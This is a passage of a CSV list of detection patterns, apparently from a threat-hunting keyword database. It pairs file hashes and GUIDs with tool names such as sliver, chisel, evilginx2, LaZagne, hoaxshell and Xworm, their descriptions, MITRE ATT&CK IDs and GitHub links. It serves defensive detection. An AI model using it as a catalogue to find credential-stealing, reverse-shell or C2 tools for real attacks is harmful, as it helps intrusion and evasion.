TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a*",".{0,1000}978dbbb6bf4794203430805e3cfe01ae52b0bed20f4c4c88d7117ecf6b6a138a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369*",".{0,1000}97c42a422ddd966681ffad0b5bae3df1203f52b11c5be3a14bcdd76366c1f369.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147*",".{0,1000}97d1243475c5ef51df1ff21894d4e586742855c345e10938adcdfaf9dbb9a147.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449*",".{0,1000}97e7f134cfbb11e0e3ade71cdb5de36ea8cfdffe5272ea7293e35bd2b91f3449.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45*",".{0,1000}9839381c8f3e41010d167ca438c054628ea54b7c53231d444281fa217d30fc45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61*",".{0,1000}983d8e01186ca136d8543a244c21ade3f938d5c51ac610a14c37230a9f123c61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde*",".{0,1000}985976339729a11396ed9c207afa49b16961aef42db3ee69066d2d2a5c69bfde.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4*",".{0,1000}98599d98012adc240e17c6b157e52bdf7b1831e45164d4b27862189c462392d4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a*",".{0,1000}987d8536a5a920ff49ab1d0948bc5d7c45a7610b2737e407971c361d7072485a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef*",".{0,1000}989080753be26eaa2b93d3a01bd4296874162f06d126f78be96749fb95c66aef.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650*",".{0,1000}98a6c8b05256efdf08b252f191b7fefbc76486301fca678a442d2a9ef6393650.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394*",".{0,1000}98aa8eec1bda59ea57693a6312bae2b76b2e71dd29cd0f85453c3d867ec69394.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a*",".{0,1000}98ad711010195669ee57216b2b376e81fec7437ceab10ab369fee7598d931a1a.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2*",".{0,1000}98d26f3cd9d1e221c76a2b274950d73085f8dd17a2eaceffda43cf5c5a45bdc2.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea*",".{0,1000}98f65ce7ce360459e9b05b8082d13b27a37efaf63213f80a89b2e22a6a0c38ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77*",".{0,1000}98fa9af535fd48260a65e18ceb9553187786742c6c77486bb27e5fe61758ea77.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*",".{0,1000}99\$1a7F1qr2HihoXfs\/56u5XMdpDZ83N6hW\/HI\=.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583*",".{0,1000}9915aa1e343c454c31a1011d51fa3f3410a54cc70256d232d2b7a00bd1bd5583.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374*",".{0,1000}99164a220ff13f15d76096ec91b472b2ed8fd5670491f5baf073158b92e11374.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b*",".{0,1000}992bbf36c83f56d459a79cd34638f7ba932ad4a313eb9a63c8a8cf111ef9497b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952*",".{0,1000}9941d3f3192d927be91b38a3d13e40aebe91768185bc237ef798ae20f78dd952.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae*",".{0,1000}9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb*",".{0,1000}995c3ae92109046bd3bc58025b09d449a695a82b1bf5102b96091500419aabdb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e*",".{0,1000}995e755827bf8c1908e64d40a7851e05706b89e41dee63037e5c4be0b61f113e.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef*",".{0,1000}996b73993b6dfdb1d34ab51c5c36dbae12cae353cfab25cbf14b6d974613cdef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7*",".{0,1000}996d133f79b2762f547dcd6900326835517586359ffe5f443c40336983a9a2e7.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e*",".{0,1000}996e6455c47cdc9a046beeea068f06a9fe2c88d45d13fd055145aadecf23657e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a*",".{0,1000}996e7473634a2b894f6e154073d780b12f9ef1b8f1471bb945c7c2cf1c56010a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d*",".{0,1000}997969303538ff70c0e90e33789b0ef3da25556349c7017aac86dd1ad3b9264d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057*",".{0,1000}99852761bd4acc0025c07c147c56caa540b7731be755254e9c85b82f25e08057.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002*",".{0,1000}99ac2e0be445506852788ae9ed8f2deaecd39da027818c4530206ca9695e2002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768*",".{0,1000}99b151997a57f29a3e3436bb4ebbe4357219ae0694a9ae6561afa2da568a0768.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da*",".{0,1000}99b685e2a57dbbdb0b53689aec5eef525a632c9ea00a5a16adb939387bf5a4da.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52*",".{0,1000}99d336f5850bb8ce58273fb3cc8f5e2724769c0ff982601c16569e74da42da52.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a*",".{0,1000}99df113d5d44e960f503152ba57985e95e20d3491f291046eb091bb0efbc327a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*99E40E7F-00A4-4FB1-9441-B05A56C47C08*",".{0,1000}99E40E7F\-00A4\-4FB1\-9441\-B05A56C47C08.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab*",".{0,1000}9a0281a17a7ed9d95de46360406707d3b6ad20af4e3826726cc0f6a70e4496ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e*",".{0,1000}9a0da3eeb072abdcdce6774d9eb431a2be86b03c3a82e34c0cf464f8150c4e2e.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0*",".{0,1000}9a1f72ea60bdc475d434f1582a564e0afaa6b68fed8318d2e955d931135818f0.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1*",".{0,1000}9a30590136ad955b56d367ca00f3d9feb50d4a3fb1d643fc8e3bb3cbcfd1dfa1.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9*",".{0,1000}9a3a44c544cd596ebf94583614035575e746f57315e20ec56a819c7152ba3fe9.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378*",".{0,1000}9a9db09b688d52c14792db24734a7aeb90499da5fbd78c9fe43c63d0d3ea3378.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*",".{0,1000}9AA32BBF\-90F3\-4CE6\-B210\-CBCDB85052B0.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827*",".{0,1000}9aae462701ca988bcd44fb093d7edaab28c810b398e349981361ab4a69294827.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*",".{0,1000}9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5*",".{0,1000}9ad6daccfd1d3d349a93950f599eed59280268431d76bad7fc624d4cd4c565a5.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046*",".{0,1000}9ae37b21e20b611787f1219137b545597235c23fd54c0e73919b9ae3266bd046.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5*",".{0,1000}9ae751fb94283840a31634a56a3d2a8010949694378a1ae3fea51acd98b52fa5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - 